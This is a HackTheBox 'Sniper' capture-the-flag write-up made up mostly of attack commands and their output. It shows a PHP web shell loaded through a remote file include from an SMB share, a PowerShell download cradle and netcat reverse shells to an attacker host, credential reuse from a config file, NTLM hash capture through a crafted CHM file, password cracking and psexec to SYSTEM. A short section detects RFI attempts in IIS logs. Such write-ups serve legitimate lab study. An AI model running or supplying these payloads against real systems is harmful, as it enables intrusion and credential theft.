
HTB — Sniper

PHP RFI via language parameter loads SMB share for RCE. Lateral movement via credential in web config. CHM file drops reverse shell as Administrator.

November 21, 2024 · HackTheBox
#RFI #SMB #CHM #LFI

nmap

```sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.10.151
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-21 02:34 EST
Stats: 0:02:29 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 97.71% done; ETC: 02:36 (0:00:00 remaining)
Nmap scan report for 10.10.10.151
Host is up (0.021s latency).
Not shown: 65530 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Sniper Co.
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
49667/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-11-21T14:36:42
|_  start_date: N/A
|_clock-skew: 6h59m59s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   21.06 ms 10.10.14.1
2   21.11 ms 10.10.10.151

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 187.20 seconds
```

80/tcp open http

```sh
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Sniper Co.
```

lfi

/windows/win.ini

  • https://www.a2hosting.com/kb/developer-corner/php/using-php-sessions/

rfi

```sh
echo "<?php system(\$_GET['cmd']);?>" > shell.php
```

```sh
sudo impacket-smbserver share -smb2support ./
```

```http
GET /blog/?lang=\\10.10.14.4\share\shell.php&cmd=whoami HTTP/1.1
```
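From the defender's side, the `lang` include above leaves a clear trace in the IIS logs: a query-string value that is a UNC path, a URL, a PHP wrapper, or an absolute/traversal path. The following Python detector is an added example, not part of the writeup; the IIS W3C log excerpt is constructed here (the field layout is an assumption) and mirrors the requests used on this box.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C log excerpt (not captured from the box); the #Fields layout is an assumption.
SAMPLE_IIS_LOG = r"""#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip cs(User-Agent) sc-status
2024-11-21 07:34:10 10.10.10.151 GET /blog/ lang=en 80 10.10.14.4 Mozilla/5.0 200
2024-11-21 07:35:02 10.10.10.151 GET /blog/ lang=\\10.10.14.4\share\shell.php&cmd=whoami 80 10.10.14.4 Mozilla/5.0 200
2024-11-21 07:36:44 10.10.10.151 GET /blog/ lang=%5c%5c10.10.14.4%5cshare%5cshell.php&cmd=whoami 80 10.10.14.4 Mozilla/5.0 200
2024-11-21 07:37:01 10.10.10.151 GET /blog/ lang=http://10.10.14.4/shell.txt 80 10.10.14.4 curl/8.0 500
2024-11-21 07:38:12 10.10.10.151 GET /blog/ lang=/windows/win.ini 80 10.10.14.4 curl/8.0 200
"""

# Shapes a user-controlled include path should never take; each is checked on the URL-decoded value.
INDICATORS = {
    "unc_path": re.compile(r"^\\\\[^\\]+\\"),                  # \\host\share\... (SMB include, also leaks NetNTLMv2)
    "remote_url": re.compile(r"^(https?|ftp|smb)://", re.I),   # classic RFI, needs allow_url_include
    "php_wrapper": re.compile(r"^(php|data|expect|phar)://", re.I),
    "traversal": re.compile(r"(^|[\\/])\.\.([\\/]|$)"),         # ../ or ..\ stepping out of the include dir
    "abs_path": re.compile(r"^([a-z]:[\\/]|/)", re.I),         # absolute path, e.g. the /windows/win.ini LFI probe
}

def classify_value(raw_value: str) -> list:
    """Return the indicator names matched by one query-string value."""
    value = unquote_plus(raw_value)
    return [name for name, rx in INDICATORS.items() if rx.search(value)]

def parse_w3c(text: str):
    """Yield one dict per W3C log record, taking column names from the #Fields directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            parts = line.split(" ")
            if len(parts) == len(fields):
                yield dict(zip(fields, parts))

def find_rfi_attempts(text: str) -> list:
    """Flag every request whose query carries an include-style parameter value."""
    hits = []
    for rec in parse_w3c(text):
        if rec.get("cs-uri-query", "-") == "-":
            continue
        for pair in rec["cs-uri-query"].split("&"):
            name, _, raw = pair.partition("=")
            tags = classify_value(raw)
            if tags:
                hits.append({"time": f'{rec["date"]} {rec["time"]}', "client": rec["c-ip"],
                             "param": name, "value": unquote_plus(raw), "tags": tags})
    return hits
```

Running `find_rfi_attempts(SAMPLE_IIS_LOG)` flags the two UNC includes (plain and percent-encoded), the HTTP URL and the absolute-path probe, and leaves the legitimate `lang=en` request alone.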

powercat rev shell

```sh
python3 -m http.server 80
```

```sh
nc -lnvp 443
```

burp

```http
GET /blog/?lang=\\10.10.14.4\share\shell.php&cmd=powershell.exe+IEX+(New-Object+System.Net.Webclient).DownloadString('http%3a//10.10.14.4/powercat.ps1')%3bpowercat+-c+10.10.14.4+-p+443+-e+cmd HTTP/1.1
```

```sh
nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.151] 49697
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\inetpub\wwwroot\blog>whoami
whoami
nt authority\iusr
```
```cmd
C:\Users>systmeinfo
systmeinfo

'systmeinfo' is not recognized as an internal or external command,
operable program or batch file.
C:\Users>systeminfo
systeminfo

Host Name:                 SNIPER
OS Name:                   Microsoft Windows Server 2019 Standard
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00429-00521-62775-AA487
Original Install Date:     4/9/2019, 5:46:32 AM
System Boot Time:          11/24/2024, 3:49:56 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz
                           [02]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.23553139.B64.2403260936, 3/26/2024
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume3
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory:     6,143 MB
Available Physical Memory: 3,972 MB
Virtual Memory: Max Size:  7,807 MB
Virtual Memory: Available: 5,648 MB
Virtual Memory: In Use:    2,159 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet0 2
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.151
                                 [02]: fe80::c880:1a2b:1ad3:f29a
                                 [03]: dead:beef::c880:1a2b:1ad3:f29a
                                 [04]: dead:beef::157
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.
```

db.php

```powershell
PS C:\inetpub\wwwroot\user> cat db.php
cat db.php
<?php
// Enter your Host, username, password, database below.
// I left password empty because i do not set password on localhost.
$con = mysqli_connect("localhost","dbuser","36mEAhz/B8xQ~2VM","sniper");
// Check connection
if (mysqli_connect_errno())
  {
  echo "Failed to connect to MySQL: " . mysqli_connect_error();
  }
?>
```

```sh
nxc smb 10.10.10.151 -u 'Chris' -p '36mEAhz/B8xQ~2VM'
SMB         10.10.10.151    445    SNIPER           [*] Windows 10 / Server 2019 Build 17763 x64 (name:SNIPER) (domain:Sniper) (signing:False) (SMBv1:False)
SMB         10.10.10.151    445    SNIPER           [+] Sniper\Chris:36mEAhz/B8xQ~2VM 
```

creds

Chris:36mEAhz/B8xQ~2VM

rev shell as chris

```powershell
$password = convertto-securestring -AsPlainText -Force -String "36mEAhz/B8xQ~2VM";

$credential = new-object -typename System.Management.Automation.PSCredential -argumentlist "SNIPER\chris",$password;

Invoke-Command -ComputerName LOCALHOST -ScriptBlock { wget http://10.10.14.4/nc.exe -o C:\Users\chris\nc.exe } -credential $credential;

Invoke-Command -ComputerName LOCALHOST -ScriptBlock { C:\Users\chris\nc.exe -e cmd.exe 10.10.14.4 443} -credential $credential;
```

```sh
nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.151] 49721
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\Chris\Documents>whoami
whoami
sniper\chris
```

user.txt

```cmd
C:\Users\Chris\Desktop>type user.txt
type user.txt
0f6225e5...
```

priv esc

```cmd
C:\Docs>type note.txt
type note.txt
Hi Chris,
	Your php skillz suck. Contact yamitenshi so that he teaches you how to use it and after that fix the website as there are a lot of bugs on it. And I hope that you've prepared the documentation for our new app. Drop it here when you're done with it.

Regards,
Sniper CEO.
```

```cmd
C:\Docs>copy "php for dummies-trial.pdf" \\10.10.14.4\share\
copy "php for dummies-trial.pdf" \\10.10.14.4\share\
        1 file(s) copied.
```

```cmd
certutil.exe -f -urlcache -split http://10.10.14.4/winPEASx64.exe winPEASx64.exe
```

instructions.chm

```cmd
C:\Users\Chris\Downloads>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is AE98-73A8

 Directory of C:\Users\Chris\Downloads

04/11/2019  07:36 AM    <DIR>          .
04/11/2019  07:36 AM    <DIR>          ..
04/11/2019  07:36 AM            10,462 instructions.chm
               1 File(s)         10,462 bytes
               2 Dir(s)   2,294,296,576 bytes free
```

```cmd
C:\Users\Chris\Downloads>copy instructions.chm \\10.10.14.4\share\
copy instructions.chm \\10.10.14.4\share\
        1 file(s) copied.
```

  • Using a Windows VM with HTML Help Workshop
  • File ->

instructions.html

```html
<html>
    <body>
        <img src=\\10.10.14.4\share\abc.png />
    </body>
</html>
```

  • Compile the project

  • Transfer the compiled CHM to the Sniper machine

```cmd
certutil.exe -f -urlcache -split http://10.10.14.4/instructions.chm instructions.chm
```

hash

```sh
sudo impacket-smbserver share -smb2support ./ 
Impacket v0.12.0.dev1+20240523.75507.15eff880 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.151,49728)
[*] AUTHENTICATE_MESSAGE (\,SNIPER)
[*] User SNIPER\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:share)
[*] AUTHENTICATE_MESSAGE (SNIPER\Administrator,SNIPER)
[*] User SNIPER\Administrator authenticated successfully
[*] Administrator::SNIPER:aaaaaaaaaaaaaaaa:4cecbfcf...:010100000000000080642cd0523fdb01f13b9bf5d61f44c300000000010010007800560050004e0073005a0055004a00030010007800560050004e0073005a0055004a000200100064007100680046004c006f007a0077000400100064007100680046004c006f007a0077000700080080642cd0523fdb0106000400020000000800300030000000000000000000000000300000d79e2ac96f69a017ac3065dd98a687ed9e9ba557c302378cd914662a526fc42f0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e003400000000000000000000000000
[*] AUTHENTICATE_MESSAGE (SNIPER\Administrator,SNIPER)
[*] User SNIPER\Administrator authenticated successfully
[*] Administrator::SNIPER:aaaaaaaaaaaaaaaa:c6c74e48...:010100000000000080642cd0523fdb01732a65f8d6436b4500000000010010007800560050004e0073005a0055004a00030010007800560050004e0073005a0055004a000200100064007100680046004c006f007a0077000400100064007100680046004c006f007a0077000700080080642cd0523fdb0106000400020000000800300030000000000000000000000000300000d79e2ac96f69a017ac3065dd98a687ed9e9ba557c302378cd914662a526fc42f0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e003400000000000000000000000000
```
```sh
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6-851-g6716447df) starting

OpenCL API (OpenCL 3.0 PoCL 5.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 16.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-penryn-13th Gen Intel(R) Core(TM) i9-13900HX, 5327/10718 MB (2048 MB allocatable), 6MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

ADMINISTRATOR::SNIPER:aaaaaaaaaaaaaaaa:c6c74e48...:010100000000000080642cd0523fdb01732a65f8d6436b4500000000010010007800560050004e0073005a0055004a00030010007800560050004e0073005a0055004a000200100064007100680046004c006f007a0077000400100064007100680046004c006f007a0077000700080080642cd0523fdb0106000400020000000800300030000000000000000000000000300000d79e2ac96f69a017ac3065dd98a687ed9e9ba557c302378cd914662a526fc42f0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e003400000000000000000000000000:butterfly!#1
```

creds

butterfly!#1

```sh
nxc smb 10.10.10.151 -u 'administrator' -p 'butterfly!#1'
SMB         10.10.10.151    445    SNIPER           [*] Windows 10 / Server 2019 Build 17763 x64 (name:SNIPER) (domain:Sniper) (signing:False) (SMBv1:False)
SMB         10.10.10.151    445    SNIPER           [+] Sniper\administrator:butterfly!#1 (Pwn3d!)
```

psexec

```sh
impacket-psexec administrator:'butterfly!#1'@10.10.10.151
Impacket v0.12.0.dev1+20240523.75507.15eff880 - Copyright 2023 Fortra

[*] Requesting shares on 10.10.10.151.....
[*] Found writable share ADMIN$
[*] Uploading file NGTyiUjV.exe
[*] Opening SVCManager on 10.10.10.151.....
[*] Creating service hTOo on 10.10.10.151.....
[*] Starting service hTOo.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system
```

root.txt

```cmd
C:\Users\Administrator\Desktop> type root.txt
b1655784...
```